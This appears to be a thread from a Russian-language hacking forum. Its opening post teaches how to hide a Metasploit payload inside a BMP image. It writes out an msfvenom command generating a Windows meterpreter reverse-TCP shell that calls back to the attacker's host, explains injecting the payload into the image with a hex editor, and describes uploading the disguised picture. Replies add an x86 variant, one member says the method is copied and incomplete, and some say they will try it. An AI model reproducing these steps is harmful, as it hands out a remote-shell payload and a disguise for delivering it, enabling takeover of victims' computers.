• Начинающий хакер, спасибо что зашёл к нам! Для полного удобства рекомендуем Вам сразу же зарегистрироваться. Помните, необходимо придумать сложный пароль к своему логину, в котором будут присутствовать цифры, а так же символы. После регистрации вы сможете пользоваться чатом. Так же не забудьте активировать аккаунт через письмо, высланное вам на почту ! Администрация заботится о каждом из Вас...
  • Для просмотра разделов из категории Private Informations & Programms необходимо купить

Злая КАРТИНКА

  • Автор темы Автор темы baddagh
  • Дата начала Дата начала

baddagh

Пользователь
Местный

baddagh

Пользователь
Местный
Регистрация
2 Авг 2017
Сообщения
56
Реакции
6
Баллы
2
Всем привет! сегодня я с Вами по делюсь техникой доставки пэйлода не обычным образом а именно через картинку!
Ибо решил я застолбить эту методику первым на русско-говорящем пространстве и кстати приятно читать свои статьи на ХАК-бордах))) Собсна хочу обратится к копиастерам увожаемые Вы хоть источник указывайте где взяли инструкции, а то люди у вас интересуются по подробностям ну, а Вы в свою очередь их игнорите так-как не знаете всех ньансов моих методик!
Приступим, нам понадобится фотошоп по желанию, программа paint эта утилита есть по умолчанию в винде! И великий и могучий "ДРАКОН" kali-linux в нем и сгенерим наш пэйлоад командой:
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f num > payload.txt





Далее открываем Пайнт в винде и создаем файл .bmp 24-разрядный, размером: длинна 700 высота 2 в пикселях!



переносим его в кали и открываем утилитой hexeditor : hexeditor <name>.bat
копируем наш сгенереный текст в hex-код картинки!





смотрим и видим что наша нагрузка успешно телепортировалась в картинку)) Далее я проявил креатив и позитиу, скрестил его в фотошопе с моей "иконой"






Следущее что я сделал загрузил свою "злую" картинку на какой то сервак)) то есть на общий доступ.

 

Saitek

Пользователь
Местный

Saitek

Пользователь
Местный
Регистрация
19 Июн 2017
Сообщения
108
Реакции
17
Баллы
2
Чет я допенькать не могу, н@хуй оно надо то xD
 

pe4onka34

Пользователь
Местный

pe4onka34

Пользователь
Местный
Регистрация
7 Авг 2017
Сообщения
20
Реакции
5
Баллы
2
Saitek написал(а):
Чет я допенькать не могу, н@хуй оно надо то xD
тоже интересно, что же будет при открытии картинки.
 

Aceki

Повелитель клавиатуры
Топовый

Aceki

Повелитель клавиатуры
Топовый
Регистрация
19 Янв 2017
Сообщения
966
Реакции
210
Баллы
4
Telegram
@Aceki
Уточнение - если вы создаёте payload для x32 системы используйте "windows/meterpreter/reverse_tcp" вместо "windows/x64/meterpreter/reverse_tcp"
 

Viskas1337

Пользователь
Местный

Viskas1337

Пользователь
Местный
Регистрация
27 Май 2017
Сообщения
22
Реакции
1
Баллы
2
pe4onka34 написал(а):
тоже интересно, что же будет при открытии картинки.
ну по всей видимости, запуститься программа на сервере.
 

SoundX

Пользователь
Пользователь

SoundX

Пользователь
Пользователь
Регистрация
6 Авг 2017
Сообщения
20
Реакции
0
Баллы
1
Saitek написал(а):
Чет я допенькать не могу, н@хуй оно надо то xD

Зохватит тачку. Заливает meterpreter в корень папки windows, а там можно и майнера закинуть. Это если я всё правильно понял.

Да и вообще, господа, вы странные. Сидите на форуме таком и даже в гугл заглянуть не судьба? Вы наверно даже о kali никогда не слышали и linux только в страшных снах видели? Я за 2 минуты гугления уже примерно понял что это за зверь и что примерно делает.
 
Последнее редактирование:

world

Пользователь
Местный

world

Пользователь
Местный
Регистрация
11 Июн 2017
Сообщения
39
Реакции
8
Баллы
2
ТС объясни по подробней. Что это даст?Что произойдет при открытие картинки?
 

Saitek

Пользователь
Местный

Saitek

Пользователь
Местный
Регистрация
19 Июн 2017
Сообщения
108
Реакции
17
Баллы
2
@SoundX, Малыш,не плачь, я знаю что ты "самый" умный. Я загуглил, понял что это, но смысл от этой картинки не понял
 

Aceki

Повелитель клавиатуры
Топовый

Aceki

Повелитель клавиатуры
Топовый
Регистрация
19 Янв 2017
Сообщения
966
Реакции
210
Баллы
4
Telegram
@Aceki
Статья с сайта codeby. Чел, если ты берёшь статью с другого сайта ты сначала сам её прочитай. Это только первая часть статьи, вторую автор не написал. Так что не нужно такое выкладывать.
 

Aceki

Повелитель клавиатуры
Топовый

Aceki

Повелитель клавиатуры
Топовый
Регистрация
19 Янв 2017
Сообщения
966
Реакции
210
Баллы
4
Telegram
@Aceki
Saitek написал(а):
Чет я допенькать не могу, н@хуй оно надо то xD

pe4onka34 написал(а):
тоже интересно, что же будет при открытии картинки.

world написал(а):
ТС объясни по подробней. Что это даст?Что произойдет при открытие картинки?
Почитал я комменты на codeby, там автор пишет что payload в картинке выполняется с помощью специального скрипта, который предварительно нужно загрузить на сервер.
Потом остаётся только сессию принять.
 

ARTE3M

Пользователь
Пользователь

ARTE3M

Пользователь
Пользователь
Регистрация
11 Авг 2017
Сообщения
35
Реакции
0
Баллы
1
норм тема
 

SeMgA

Пользователь
Местный

SeMgA

Пользователь
Местный
Регистрация
30 Июл 2017
Сообщения
73
Реакции
11
Баллы
2
Очень злая штука, сейчас будем пробовать!
 

Dmitry_DJ

Пользователь
Пользователь

Dmitry_DJ

Пользователь
Пользователь
Регистрация
14 Авг 2017
Сообщения
24
Реакции
16
Баллы
2
Telegram
@DJ_VIANEX
очень интерестная схема
 

vaidas

Пользователь
Пользователь

vaidas

Пользователь
Пользователь
Регистрация
25 Май 2017
Сообщения
0
Реакции
0
Баллы
0
бред какой то
 
Сверху Снизу